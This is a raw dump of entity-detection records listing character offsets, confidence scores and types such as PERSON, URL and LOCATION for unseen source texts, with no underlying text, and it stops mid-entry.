start: 6597, end: 6605, score: 0.85, type: PERSON, start: 6725, end: 6733, score: 0.85, type: PERSON, start: 7660, end: 7668, score: 0.85, type: PERSON, start: 8096, end: 8104, score: 0.85, type: PERSON, start: 11378, end: 11438, score: 0.85, type: PERSON, start: 11504, end: 11517, score: 0.85, type: LOCATION, start: 12191, end: 12193, score: 0.85, type: LOCATION, start: 12384, end: 12386, score: 0.85, type: LOCATION, start: 12527, end: 12529, score: 0.85, type: LOCATION, start: 12676, end: 12678, score: 0.85, type: LOCATION, 
start: 12882, end: 12884, score: 0.85, type: LOCATION, start: 13053, end: 13055, score: 0.85, type: PERSON, start: 14665, end: 14709, score: 0.85, type: PERSON, start: 14969, end: 14982, score: 0.85, type: PERSON, start: 15035, end: 15048, score: 0.85, type: LOCATION, start: 15167, end: 15172, score: 0.85, type: PERSON, start: 15407, end: 15412, score: 0.85, type: PERSON, start: 15458, end: 15503, score: 0.85, type: PERSON, start: 15576, end: 15584, score: 0.85, type: PERSON, start: 15953, end: 15966, score: 0.85, type: PERSON, start: 16019, end: 16032, score: 0.85, type: PERSON, start: 17412, end: 17425, score: 0.85, type: PERSON, start: 17478, end: 17491, score: 0.85, type: PERSON, start: 17826, end: 17871, score: 0.85, type: PERSON, start: 18409, end: 18422, score: 0.85, type: PERSON, start: 18475, end: 18488, score: 0.85, type: PERSON, start: 20002, end: 20015, score: 0.85, type: PERSON, start: 20068, end: 20081, score: 0.85, type: PERSON, start: 21634, end: 21647, score: 0.85, type: PERSON, start: 22019, end: 22032, score: 0.85, type: PERSON, start: 25941, end: 25954, score: 0.85, type: PERSON, start: 27478, end: 27491, score: 0.85, type: URL, start: 162, end: 213, score: 0.6, type: URL, start: 20929, end: 20976, score: 0.6, type: URL, start: 508, end: 520, score: 0.5, type: URL, start: 1370, end: 1377, score: 0.5, type: URL, start: 1408, end: 1415, score: 0.5, type: URL, start: 1551, end: 1558, score: 0.5, type: URL, start: 1629, end: 1636, score: 0.5, type: URL, start: 1724, end: 1731, score: 0.5, type: URL, start: 1782, end: 1793, score: 0.5, type: URL, start: 1864, end: 1871, score: 0.5, type: URL, start: 1898, end: 1905, score: 0.5, type: URL, start: 1922, end: 1929, score: 0.5, type: URL, start: 1958, end: 1965, score: 0.5, type: URL, start: 1982, end: 1989, score: 0.5, type: URL, start: 2010, end: 2017, score: 0.5, type: URL, start: 2053, end: 2060, score: 0.5, type: URL, start: 2081, end: 2088, score: 0.5, type: URL, start: 2124, end: 2131, score: 0.5, type: URL, start: 2152, end: 2159, score: 0.5, type: URL, start: 2195, end: 2202, score: 0.5, type: URL, start: 2219, end: 2226, score: 0.5, type: URL, start: 2253, end: 2260, score: 0.5, type: URL, start: 2278, end: 2289, score: 0.5, type: URL, start: 2377, end: 2384, score: 0.5, type: URL, start: 2400, end: 2407, score: 0.5, type: URL, start: 2539, end: 2546, score: 0.5, type: URL, start: 2602, end: 2613, score: 0.5, type: URL, start: 2807, end: 2814, score: 0.5, type: URL, start: 2903, end: 2910, score: 0.5, type: URL, start: 3067, end: 3074, score: 0.5, type: URL, start: 3267, end: 3274, score: 0.5, type: URL, start: 3393, end: 3400, score: 0.5, type: URL, start: 3520, end: 3527, score: 0.5, type: URL, start: 3650, end: 3657, score: 0.5, type: URL, start: 3795, end: 3802, score: 0.5, type: URL, start: 3932, end: 3939, score: 0.5, type: URL, start: 4065, end: 4072, score: 0.5, type: URL, start: 4220, end: 4227, score: 0.5, type: URL, start: 4380, end: 4387, score: 0.5, type: URL, start: 4540, end: 4547, score: 0.5, type: URL, start: 4589, end: 4596, score: 0.5, type: URL, start: 4697, end: 4704, score: 0.5, type: URL, start: 4752, end: 4759, score: 0.5, type: URL, start: 4866, end: 4873, score: 0.5, type: URL, start: 4995, end: 5002, score: 0.5, type: URL, start: 5115, end: 5122, score: 0.5, type: URL, start: 5221, end: 5228, score: 0.5, type: URL, start: 5338, end: 5345, score: 0.5, type: URL, start: 5484, end: 5491, score: 0.5, type: URL, start: 5656, end: 5663, score: 0.5, type: URL, start: 5804, end: 5811, score: 0.5, 
type: URL, start: 5956, end: 5963, score: 0.5, type: URL, start: 6143, end: 6150, score: 0.5, type: URL, start: 6302, end: 6309, score: 0.5, type: URL, start: 6490, end: 6497, score: 0.5, type: URL, start: 6621, end: 6628, score: 0.5, type: URL, start: 6749, end: 6756, score: 0.5, type: URL, start: 6924, end: 6931, score: 0.5, type: URL, start: 6987, end: 6998, score: 0.5, type: URL, start: 7132, end: 7137, score: 0.5, type: URL, start: 7172, end: 7179, score: 0.5, type: URL, start: 7341, end: 7346, score: 0.5, type: URL, start: 7375, end: 7382, score: 0.5, type: URL, start: 7512, end: 7517, score: 0.5, type: URL, start: 7552, end: 7559, score: 0.5, type: URL, start: 7752, end: 7757, score: 0.5, type: URL, start: 7786, end: 7793, score: 0.5, type: URL, start: 7950, end: 7955, score: 0.5, type: URL, start: 7990, end: 7997, score: 0.5, type: URL, start: 8204, end: 8209, score: 0.5, type: URL, start: 8238, end: 8245, score: 0.5, type: URL, start: 8454, end: 8461, score: 0.5, type: URL, start: 8515, end: 8522, score: 0.5, type: URL, start: 8609, end: 8620, score: 0.5, type: URL, start: 8848, end: 8855, score: 0.5, type: URL, start: 8906, end: 8913, score: 0.5, type: URL, start: 9054, end: 9061, score: 0.5, type: URL, start: 9243, end: 9250, score: 0.5, type: URL, start: 9439, end: 9446, score: 0.5, type: URL, start: 9733, end: 9740, score: 0.5, type: URL, start: 10004, end: 10011, score: 0.5, type: URL, start: 10280, end: 10287, score: 0.5, type: URL, start: 10641, end: 10652, score: 0.5, type: URL, start: 10783, end: 10790, score: 0.5, type: URL, start: 10841, end: 10848, score: 0.5, type: URL, start: 10911, end: 10918, score: 0.5, type: URL, start: 11103, end: 11110, score: 0.5, type: URL, start: 11383, end: 11390, score: 0.5, type: URL, start: 11411, end: 11418, score: 0.5, type: URL, start: 11470, end: 11477, score: 0.5, type: URL, start: 11504, end: 11511, score: 0.5, type: URL, start: 11622, end: 11629, score: 0.5, type: URL, start: 11883, end: 11890, score: 0.5, type: URL, start: 12158, end: 12165, score: 0.5, type: URL, start: 12351, end: 12358, score: 0.5, type: URL, start: 12494, end: 12501, score: 0.5, type: URL, start: 12643, end: 12650, score: 0.5, type: URL, start: 12849, end: 12856, score: 0.5, type: URL, start: 13020, end: 13027, score: 0.5, type: URL, start: 13191, end: 13198, score: 0.5, type: URL, start: 13245, end: 13252, score: 0.5, type: URL, start: 13380, end: 13387, score: 0.5, type: URL, start: 13439, end: 13446, score: 0.5, type: URL, start: 13497, end: 13512, score: 0.5, type: URL, start: 13914, end: 13921, score: 0.5, type: URL, start: 13964, end: 13971, score: 0.5, type: URL, start: 14018, end: 14025, score: 0.5, type: URL, start: 14077, end: 14084, score: 0.5, type: URL, start: 14238, end: 14245, score: 0.5, type: URL, start: 14297, end: 14304, score: 0.5, type: URL, start: 14476, end: 14483, score: 0.5, type: URL, start: 14675, end: 14682, score: 0.5, type: URL, start: 14829, end: 14836, score: 0.5, type: URL, start: 14915, end: 14922, score: 0.5, type: URL, start: 14969, end: 14976, score: 0.5, type: URL, start: 14997, end: 15004, score: 0.5, type: URL, start: 15035, end: 15042, score: 0.5, type: URL, start: 15076, end: 15083, score: 0.5, type: URL, start: 15268, end: 15275, score: 0.5, type: URL, start: 15315, end: 15322, score: 0.5, type: URL, start: 15365, end: 15372, score: 0.5, type: URL, start: 15415, end: 15422, score: 0.5, type: URL, start: 15469, end: 15476, score: 0.5, type: URL, start: 15528, end: 15535, score: 0.5, type: URL, start: 15587, end: 
15594, score: 0.5, type: URL, start: 15646, end: 15653, score: 0.5, type: URL, start: 15775, end: 15782, score: 0.5, type: URL, start: 15837, end: 15844, score: 0.5, type: URL, start: 15892, end: 15899, score: 0.5, type: URL, start: 15953, end: 15960, score: 0.5, type: URL, start: 15981, end: 15988, score: 0.5, type: URL, start: 16019, end: 16026, score: 0.5, type: URL, start: 16211, end: 16218, score: 0.5, type: URL, start: 16346, end: 16353, score: 0.5, type: URL, start: 16407, end: 16414, score: 0.5, type: URL, start: 16568, end: 16575, score: 0.5, type: URL, start: 16751, end: 16758, score: 0.5, type: URL, start: 16810, end: 16817, score: 0.5, type: URL, start: 16895, end: 16902, score: 0.5, type: URL, start: 17093, end: 17100, score: 0.5, type: URL, start: 17272, end: 17279, score: 0.5, type: URL, start: 17345, end: 17352, score: 0.5, type: URL, start: 17412, end: 17419, score: 0.5, type: URL, start: 17440, end: 17447, score: 0.5, type: URL, start: 17478, end: 17485, score: 0.5, type: URL, start: 17519, end: 17526, score: 0.5, type: URL, start: 17686, end: 17693, score: 0.5, type: URL, start: 17733, end: 17740, score: 0.5, type: URL, start: 17783, end: 17790, score: 0.5, type: URL, start: 17837, end: 17844, score: 0.5, type: URL, start: 17896, end: 17903, score: 0.5, type: URL, start: 17945, end: 17952, score: 0.5, type: URL, start: 18056, end: 18063, score: 0.5, type: URL, start: 18172, end: 18179, score: 0.5, type: URL, start: 18230, end: 18237, score: 0.5, type: URL, start: 18292, end: 18299, score: 0.5, type: URL, start: 18348, end: 18355, score: 0.5, type: URL, start: 18409, end: 18416, score: 0.5, type: URL, start: 18437, end: 18444, score: 0.5, type: URL, start: 18475, end: 18482, score: 0.5, type: URL, start: 18517, end: 18524, score: 0.5, type: URL, start: 18643, end: 18650, score: 0.5, type: URL, start: 18705, end: 18712, score: 0.5, type: URL, start: 18867, end: 18874, score: 0.5, type: URL, start: 19088, end: 19095, score: 0.5, type: URL, start: 19148, end: 19155, score: 0.5, type: URL, start: 19234, end: 19241, score: 0.5, type: URL, start: 19305, end: 19316, score: 0.5, type: URL, start: 19490, end: 19497, score: 0.5, type: URL, start: 19561, end: 19572, score: 0.5, type: URL, start: 19735, end: 19742, score: 0.5, type: URL, start: 19841, end: 19852, score: 0.5, type: URL, start: 19879, end: 19886, score: 0.5, type: URL, start: 19944, end: 19951, score: 0.5, type: URL, start: 20002, end: 20009, score: 0.5, type: URL, start: 20030, end: 20037, score: 0.5, type: URL, start: 20068, end: 20075, score: 0.5, type: URL, start: 20109, end: 20116, score: 0.5, type: URL, start: 20321, end: 20328, score: 0.5, type: URL, start: 20535, end: 20542, score: 0.5, type: URL, start: 20711, end: 20718, score: 0.5, type: URL, start: 21025, end: 21032, score: 0.5, type: URL, start: 21093, end: 21100, score: 0.5, type: URL, start: 21201, end: 21208, score: 0.5, type: URL, start: 21509, end: 21516, score: 0.5, type: URL, start: 21554, end: 21561, score: 0.5, type: URL, start: 21600, end: 21607, score: 0.5, type: URL, start: 21634, end: 21641, score: 0.5, type: URL, start: 21687, end: 21694, score: 0.5, type: URL, start: 21730, end: 21737, score: 0.5, type: URL, start: 21798, end: 21805, score: 0.5, type: URL, start: 21859, end: 21866, score: 0.5, type: URL, start: 21924, end: 21931, score: 0.5, type: URL, start: 21985, end: 21992, score: 0.5, type: URL, start: 22019, end: 22026, score: 0.5, type: URL, start: 22140, end: 22147, score: 0.5, type: URL, start: 22287, end: 22294, score: 0.5, type: 
URL, start: 22441, end: 22448, score: 0.5, type: URL, start: 22721, end: 22728, score: 0.5, type: URL, start: 22881, end: 22888, score: 0.5, type: URL, start: 23072, end: 23079, score: 0.5, type: URL, start: 23236, end: 23243, score: 0.5, type: URL, start: 23394, end: 23401, score: 0.5, type: URL, start: 23530, end: 23537, score: 0.5, type: URL, start: 23584, end: 23591, score: 0.5, type: URL, start: 23654, end: 23661, score: 0.5, type: URL, start: 23909, end: 23916, score: 0.5, type: URL, start: 24035, end: 24042, score: 0.5, type: URL, start: 24251, end: 24258, score: 0.5, type: URL, start: 24377, end: 24384, score: 0.5, type: URL, start: 24529, end: 24536, score: 0.5, type: URL, start: 24583, end: 24590, score: 0.5, type: URL, start: 24653, end: 24660, score: 0.5, type: URL, start: 25190, end: 25197, score: 0.5, type: URL, start: 25485, end: 25492, score: 0.5, type: URL, start: 25590, end: 25601, score: 0.5, type: URL, start: 25723, end: 25730, score: 0.5, type: URL, start: 25751, end: 25758, score: 0.5, type: URL, start: 25803, end: 25810, score: 0.5, type: URL, start: 25941, end: 25948, score: 0.5, type: URL, start: 26113, end: 26120, score: 0.5, type: URL, start: 26185, end: 26192, score: 0.5, type: URL, start: 26259, end: 26266, score: 0.5, type: URL, start: 26539, end: 26546, score: 0.5, type: URL, start: 26877, end: 26884, score: 0.5, type: URL, start: 27015, end: 27022, score: 0.5, type: URL, start: 27134, end: 27141, score: 0.5, type: URL, start: 27260, end: 27267, score: 0.5, type: URL, start: 27288, end: 27295, score: 0.5, type: URL, start: 27340, end: 27347, score: 0.5, type: URL, start: 27478, end: 27485, score: 0.5, type: URL, start: 27653, end: 27660, score: 0.5, type: URL, start: 27725, end: 27732, score: 0.5, type: URL, start: 27799, end: 27806, score: 0.5, type: URL, start: 28085, end: 28092, score: 0.5, type: URL, start: 28411, end: 28418, score: 0.5, type: URL, start: 28537, end: 28544, score: 0.5, type: URL, start: 28681, end: 28688, score: 0.5, type: EMAIL_ADDRESS, start: 1379, end: 1394, score: 1.0, type: PERSON, start: 770, end: 780, score: 0.85, type: PERSON, start: 826, end: 841, score: 0.85, type: PERSON, start: 844, end: 869, score: 0.85, type: PERSON, start: 1799, end: 1823, score: 0.85, type: PERSON, start: 1891, end: 1904, score: 0.85, type: PERSON, start: 2410, end: 2414, score: 0.85, type: PERSON, start: 3153, end: 3157, score: 0.85, type: DATE_TIME, start: 4019, end: 4047, score: 0.85, type: PERSON, start: 4114, end: 4141, score: 0.85, type: DATE_TIME, start: 4210, end: 4238, score: 0.85, type: DATE_TIME, start: 5114, end: 5142, score: 0.85, type: LOCATION, start: 5791, end: 5806, score: 0.85, type: DATE_TIME, start: 7721, end: 7749, score: 0.85, type: URL, start: 1229, end: 1295, score: 0.6, type: IP_ADDRESS, start: 6230, end: 6232, score: 0.6, type: URL, start: 1385, end: 1394, score: 0.5, type: URL, start: 1604, end: 1613, score: 0.5, type: URL, start: 1643, end: 1650, score: 0.5, type: URL, start: 1827, end: 1834, score: 0.5, type: URL, start: 1962, end: 1971, score: 0.5, type: URL, start: 2515, end: 2524, score: 0.5, type: URL, start: 2728, end: 2737, score: 0.5, type: URL, start: 2761, end: 2770, score: 0.5, type: URL, start: 3049, end: 3058, score: 0.5, type: URL, start: 3176, end: 3190, score: 0.5, type: URL, start: 3908, end: 3917, score: 0.5, type: URL, start: 3950, end: 3957, score: 0.5, type: URL, start: 3999, end: 4007, score: 0.5, type: URL, start: 4030, end: 4037, score: 0.5, type: URL, start: 4128, end: 4138, score: 0.5, type: URL, start: 
4177, end: 4185, score: 0.5, type: URL, start: 4221, end: 4228, score: 0.5, type: URL, start: 4348, end: 4357, score: 0.5, type: URL, start: 4543, end: 4561, score: 0.5, type: URL, start: 4618, end: 4636, score: 0.5, type: URL, start: 4682, end: 4693, score: 0.5, type: URL, start: 4707, end: 4716, score: 0.5, type: URL, start: 4764, end: 4775, score: 0.5, type: URL, start: 4777, end: 4783, score: 0.5, type: URL, start: 4815, end: 4826, score: 0.5, type: URL, start: 4828, end: 4834, score: 0.5, type: URL, start: 4975, end: 4984, score: 0.5, type: URL, start: 5015, end: 5024, score: 0.5, type: URL, start: 5081, end: 5089, score: 0.5, type: URL, start: 5125, end: 5132, score: 0.5, type: URL, start: 5325, end: 5334, score: 0.5, type: URL, start: 6067, end: 6072, score: 0.5, type: URL, start: 6215, end: 6224, score: 0.5, type: URL, start: 6614, end: 6623, score: 0.5, type: URL, start: 7007, end: 7016, score: 0.5, type: URL, start: 7561, end: 7570, score: 0.5, type: URL, start: 7677, end: 7685, score: 0.5, type: URL, start: 7732, end: 7739, score: 0.5, type: EMAIL_ADDRESS, start: 39, end: 54, score: 1.0, type: DATE_TIME, start: 18, end: 22, score: 0.85, type: PERSON, start: 23, end: 38, score: 0.85, type: LOCATION, start: 664, end: 672, score: 0.85, type: LOCATION, start: 674, end: 683, score: 0.85, type: LOCATION, start: 685, end: 693, score: 0.85, type: LOCATION, start: 695, end: 698, score: 0.85, type: URL, start: 45, end: 54, score: 0.5, type: URL, start: 1218, end: 1225, score: 0.5, type: URL, start: 1553, end: 1560, score: 0.5, type: URL, start: 1816, end: 1825, score: 0.5, type: URL, start: 2046, end: 2055, score: 0.5, type: LOCATION, start: 330, end: 342, score: 0.85, type: URL, start: 364, end: 373, score: 0.85, type: URL, start: 457, end: 466, score: 0.85, type: PERSON, start: 576, end: 587, score: 0.85, type: PERSON, start: 667, end: 678, score: 0.85, type: PERSON, start: 740, end: 753, score: 0.85, type: PERSON, start: 781, end: 792, score: 0.85, type: PERSON, start: 857, end: 870, score: 0.85, type: PERSON, start: 898, end: 909, score: 0.85, type: LOCATION, start: 942, end: 944, score: 0.85, type: PERSON, start: 995, end: 1006, score: 0.85, type: PERSON, start: 1118, end: 1129, score: 0.85, type: PERSON, start: 1234, end: 1245, score: 0.85, type: PERSON, start: 1390, end: 1401, score: 0.85, type: PERSON, start: 1472, end: 1483, score: 0.85, type: PERSON, start: 1579, end: 1590, score: 0.85, type: PERSON, start: 1643, end: 1654, score: 0.85, type: URL, start: 2163, end: 2168, score: 0.85, type: IP_ADDRESS, start: 621, end: 630, score: 0.6, type: IP_ADDRESS, start: 715, end: 724, score: 0.6, type: IP_ADDRESS, start: 832, end: 841, score: 0.6, type: IP_ADDRESS, start: 949, end: 958, score: 0.6, type: IP_ADDRESS, start: 1088, end: 1097, score: 0.6, type: DATE_TIME, start: 1334, end: 1342, score: 0.6, type: DATE_TIME, start: 1737, end: 1743, score: 0.6, type: URL, start: 1790, end: 1817, score: 0.6, type: URL, start: 1824, end: 1867, score: 0.6, type: URL, start: 1874, end: 1915, score: 0.6, type: URL, start: 253, end: 264, score: 0.5, type: URL, start: 280, end: 289, score: 0.5, type: URL, start: 1950, end: 1968, score: 0.5, type: URL, start: 1989, end: 1998, score: 0.5, type: URL, start: 2027, end: 2036, score: 0.5, type: URL, start: 2076, end: 2090, score: 0.5, type: LOCATION, start: 78, end: 83, score: 0.85, type: NRP, start: 422, end: 433, score: 0.85, type: URL, start: 3793, end: 3802, score: 0.85, type: URL, start: 4178, end: 4189, score: 0.85, type: URL, start: 4263, end: 4285, 
score: 0.85, type: PERSON, start: 5043, end: 5081, score: 0.85, type: PERSON, start: 5101, end: 5141, score: 0.85, type: PHONE_NUMBER, start: 827, end: 837, score: 0.75, type: IP_ADDRESS, start: 765, end: 766, score: 0.6, type: IP_ADDRESS, start: 937, end: 942, score: 0.6, type: URL, start: 422, end: 429, score: 0.5, type: URL, start: 874, end: 885, score: 0.5, type: URL, start: 3627, end: 3634, score: 0.5, type: URL, start: 3672, end: 3681, score: 0.5, type: URL, start: 3739, end: 3748, score: 0.5, type: URL, start: 3954, end: 3967, score: 0.5, type: URL, start: 3995, end: 4001, score: 0.5, type: URL, start: 4457, end: 4464, score: 0.5, type: URL, start: 4922, end: 4929, score: 0.5, type: URL, start: 5056, end: 5066, score: 0.5, type: URL, start: 5114, end: 5124, score: 0.5, type: URL, start: 5178, end: 5186, score: 0.5, type: URL, start: 5276, end: 5283, score: 0.5, type: URL, start: 5307, end: 5314, score: 0.5, type: EMAIL_ADDRESS, start: 67, end: 82, score: 1.0, type: PERSON, start: 51, end: 66, score: 0.85, type: LOCATION, start: 543, end: 552, score: 0.85, type: LOCATION, start: 597, end: 606, score: 0.85, type: LOCATION, start: 1835, end: 1844, score: 0.85, type: LOCATION, start: 1893, end: 1902, score: 0.85, type: LOCATION, start: 2260, end: 2272, score: 0.85, type: PERSON, start: 2505, end: 2508, score: 0.85, type: LOCATION, start: 2986, end: 2995, score: 0.85, type: PERSON, start: 3753, end: 3771, score: 0.85, type: LOCATION, start: 3852, end: 3856, score: 0.85, type: NRP, start: 4143, end: 4146, score: 0.85, type: LOCATION, start: 4192, end: 4194, score: 0.85, type: LOCATION, start: 4241, end: 4260, score: 0.85, type: LOCATION, start: 4669, end: 4678, score: 0.85, type: LOCATION, start: 4798, end: 4807, score: 0.85, type: LOCATION, start: 5588, end: 5597, score: 0.85, type: LOCATION, start: 5964, end: 5973, score: 0.85, type: LOCATION, start: 6091, end: 6100, score: 0.85, type: NRP, start: 6284, end: 6292, score: 0.85, type: LOCATION, start: 6693, end: 6702, score: 0.85, type: LOCATION, start: 6820, end: 6829, score: 0.85, type: URL, start: 73, end: 82, score: 0.5, type: URL, start: 1238, end: 1243, score: 0.5, type: URL, start: 1315, end: 1320, score: 0.5, type: URL, start: 1372, end: 1378, score: 0.5, type: URL, start: 1421, end: 1427, score: 0.5, type: URL, start: 1544, end: 1551, score: 0.5, type: URL, start: 1558, end: 1563, score: 0.5, type: URL, start: 2181, end: 2188, score: 0.5, type: URL, start: 2234, end: 2239, score: 0.5, type: URL, start: 2260, end: 2265, score: 0.5, type: URL, start: 2362, end: 2366, score: 0.5, type: URL, start: 2376, end: 2380, score: 0.5, type: URL, start: 2512, end: 2516, score: 0.5, type: URL, start: 2524, end: 2528, score: 0.5, type: URL, start: 2548, end: 2558, score: 0.5, type: URL, start: 2662, end: 2672, score: 0.5, type: URL, start: 2687, end: 2692, score: 0.5, type: URL, start: 2959, end: 2963, score: 0.5, type: URL, start: 2968, end: 2974, score: 0.5, type: URL, start: 3010, end: 3014, score: 0.5, type: URL, start: 3069, end: 3079, score: 0.5, type: URL, start: 3239, end: 3246, score: 0.5, type: URL, start: 3281, end: 3286, score: 0.5, type: URL, start: 3290, end: 3313, score: 0.5, type: URL, start: 3398, end: 3405, score: 0.5, type: URL, start: 3465, end: 3472, score: 0.5, type: URL, start: 3480, end: 3487, score: 0.5, type: URL, start: 3730, end: 3735, score: 0.5, type: URL, start: 3857, end: 3869, score: 0.5, type: URL, start: 3916, end: 3921, score: 0.5, type: URL, start: 4174, end: 4179, score: 0.5, type: URL, start: 4306, end: 
4313, score: 0.5, type: URL, start: 4338, end: 4345, score: 0.5, type: URL, start: 4352, end: 4357, score: 0.5, type: URL, start: 4378, end: 4385, score: 0.5, type: URL, start: 4394, end: 4399, score: 0.5, type: URL, start: 4423, end: 4430, score: 0.5, type: URL, start: 4458, end: 4465, score: 0.5, type: URL, start: 4916, end: 4921, score: 0.5, type: URL, start: 4976, end: 4983, score: 0.5, type: URL, start: 5008, end: 5015, score: 0.5, type: URL, start: 5042, end: 5049, score: 0.5, type: URL, start: 5080, end: 5087, score: 0.5, type: URL, start: 5112, end: 5117, score: 0.5, type: URL, start: 5167, end: 5172, score: 0.5, type: URL, start: 5203, end: 5208, score: 0.5, type: URL, start: 5285, end: 5290, score: 0.5, type: URL, start: 5299, end: 5306, score: 0.5, type: URL, start: 5344, end: 5351, score: 0.5, type: URL, start: 5707, end: 5714, score: 0.5, type: URL, start: 5750, end: 5757, score: 0.5, type: URL, start: 5763, end: 5767, score: 0.5, type: URL, start: 6207, end: 6214, score: 0.5, type: URL, start: 6402, end: 6407, score: 0.5, type: URL, start: 6485, end: 6498, score: 0.5, type: URL, start: 6511, end: 6516, score: 0.5, type: URL, start: 7000, end: 7007, score: 0.5, type: EMAIL_ADDRESS, start: 945, end: 960, score: 1.0, type: EMAIL_ADDRESS, start: 983, end: 998, score: 1.0, type: EMAIL_ADDRESS, start: 1021, end: 1036, score: 1.0, type: EMAIL_ADDRESS, start: 1056, end: 1071, score: 1.0, type: EMAIL_ADDRESS, start: 1097, end: 1112, score: 1.0, type: DATE_TIME, start: 64, end: 73, score: 0.85, type: LOCATION, start: 75, end: 82, score: 0.85, type: LOCATION, start: 152, end: 159, score: 0.85, type: LOCATION, start: 165, end: 172, score: 0.85, type: LOCATION, start: 417, end: 424, score: 0.85, type: LOCATION, start: 749, end: 756, score: 0.85, type: DATE_TIME, start: 916, end: 925, score: 0.85, type: PERSON, start: 933, end: 943, score: 0.85, type: PERSON, start: 967, end: 981, score: 0.85, type: PERSON, start: 1005, end: 1019, score: 0.85, type: PERSON, start: 1043, end: 1054, score: 0.85, type: PERSON, start: 1078, end: 1095, score: 0.85, type: PERSON, start: 1138, end: 1145, score: 0.85, type: PERSON, start: 1152, end: 1159, score: 0.85, type: PERSON, start: 1408, end: 1415, score: 0.85, type: PERSON, start: 1745, end: 1752, score: 0.85, type: PERSON, start: 2318, end: 2352, score: 0.85, type: URL, start: 772, end: 800, score: 0.6, type: URL, start: 1768, end: 1796, score: 0.6, type: URL, start: 951, end: 960, score: 0.5, type: URL, start: 989, end: 998, score: 0.5, type: URL, start: 1027, end: 1036, score: 0.5, type: URL, start: 1062, end: 1071, score: 0.5, type: URL, start: 1103, end: 1112, score: 0.5, type: URL, start: 1961, end: 1968, score: 0.5, type: URL, start: 1995, end: 2014, score: 0.5, type: URL, start: 2057, end: 2079, score: 0.5, type: URL, start: 2175, end: 2194, score: 0.5, type: URL, start: 2262, end: 2281, score: 0.5, type: URL, start: 2369, end: 2376, score: 0.5, type: URL, start: 2399, end: 2406, score: 0.5, type: URL, start: 2432, end: 2439, score: 0.5, type: URL, start: 2459, end: 2466, score: 0.5, type: URL, start: 2567, end: 2574, score: 0.5, type: URL, start: 2590, end: 2597, score: 0.5, type: URL, start: 2610, end: 2617, score: 0.5, type: URL, start: 2635, end: 2642, score: 0.5, type: URL, start: 2805, end: 2812, score: 0.5, type: URL, start: 2833, end: 2839, score: 0.5, type: URL, start: 2934, end: 2940, score: 0.5, type: URL, start: 2969, end: 2976, score: 0.5, type: URL, start: 3076, end: 3083, score: 0.5, type: URL, start: 3105, end: 3111, score: 0.5, 
type: URL, start: 3342, end: 3364, score: 0.5, type: URL, start: 3430, end: 3437, score: 0.5, type: URL, start: 3447, end: 3456, score: 0.5, type: URL, start: 3473, end: 3480, score: 0.5, type: URL, start: 3506, end: 3513, score: 0.5, type: URL, start: 3577, end: 3584, score: 0.5, type: URL, start: 3605, end: 3612, score: 0.5, type: URL, start: 3650, end: 3661, score: 0.5, type: EMAIL_ADDRESS, start: 122, end: 137, score: 1.0, type: URL, start: 146, end: 166, score: 0.95, type: DATE_TIME, start: 76, end: 85, score: 0.85, type: PERSON, start: 109, end: 121, score: 0.85, type: DATE_TIME, start: 234, end: 249, score: 0.85, type: LOCATION, start: 1021, end: 1030, score: 0.85, type: PERSON, start: 1166, end: 1169, score: 0.85, type: LOCATION, start: 1427, end: 1436, score: 0.85, type: PERSON, start: 1469, end: 1472, score: 0.85, type: PERSON, start: 1574, end: 1588, score: 0.85, type: PERSON, start: 1887, end: 1901, score: 0.85, type: LOCATION, start: 2053, end: 2061, score: 0.85, type: PERSON, start: 2580, end: 2589, score: 0.85, type: PERSON, start: 3166, end: 3174, score: 0.85, type: PERSON, start: 3669, end: 3678, score: 0.85, type: PERSON, start: 3983, end: 3992, score: 0.85, type: PERSON, start: 4761, end: 4770, score: 0.85, type: LOCATION, start: 4916, end: 4919, score: 0.85, type: LOCATION, start: 5231, end: 5234, score: 0.85, type: LOCATION, start: 5442, end: 5451, score: 0.85, type: URL, start: 339, end: 373, score: 0.6, type: URL, start: 1605, end: 1640, score: 0.6, type: URL, start: 128, end: 137, score: 0.5, type: URL, start: 220, end: 233, score: 0.5, type: URL, start: 577, end: 584, score: 0.5, type: URL, start: 637, end: 661, score: 0.5, type: URL, start: 734, end: 739, score: 0.5, type: URL, start: 766, end: 774, score: 0.5, type: URL, start: 3144, end: 3155, score: 0.5, type: URL, start: 4497, end: 4501, score: 0.5, type: URL, start: 4600, end: 4607, score: 0.5, type: URL, start: 5626, end: 5631, score: 0.5, type: URL, start: 5679, end: 5683, score: 0.5, type: EMAIL_ADDRESS, start: 2283, end: 2298, score: 1.0, type: NRP, start: 174, end: 186, score: 0.85, type: NRP, start: 215, end: 227, score: 0.85, type: LOCATION, start: 355, end: 362, score: 0.85, type: LOCATION, start: 513, end: 517, score: 0.85, type: PERSON, start: 591, end: 595, score: 0.85, type: PERSON, start: 963, end: 978, score: 0.85, type: PERSON, start: 985, end: 991, score: 0.85, type: PERSON, start: 1821, end: 1853, score: 0.85, type: NRP, start: 3427, end: 3445, score: 0.85, type: LOCATION, start: 4886, end: 4899, score: 0.85, type: PERSON, start: 5067, end: 5080, score: 0.85, type: NRP, start: 5689, end: 5701, score: 0.85, type: PERSON, start: 7056, end: 7075, score: 0.85, type: PERSON, start: 7287, end: 7306, score: 0.85, type: PERSON, start: 7417, end: 7436, score: 0.85, type: PERSON, start: 8351, end: 8359, score: 0.85, type: PERSON, start: 9584, end: 9607, score: 0.85, type: PERSON, start: 9609, end: 9636, score: 0.85, type: URL, start: 174, end: 186, score: 0.5, type: URL, start: 215, end: 227, score: 0.5, type: URL, start: 432, end: 437, score: 0.5, type: URL, start: 963, end: 974, score: 0.5, type: URL, start: 1009, end: 1014, score: 0.5, type: URL, start: 1079, end: 1090, score: 0.5, type: URL, start: 1126, end: 1136, score: 0.5, type: URL, start: 1184, end: 1189, score: 0.5, type: URL, start: 1266, end: 1272, score: 0.5, type: URL, start: 1473, end: 1480, score: 0.5, type: URL, start: 1541, end: 1548, score: 0.5, type: URL, start: 1583, end: 1590, score: 0.5, type: URL, start: 1621, end: 1628, score: 
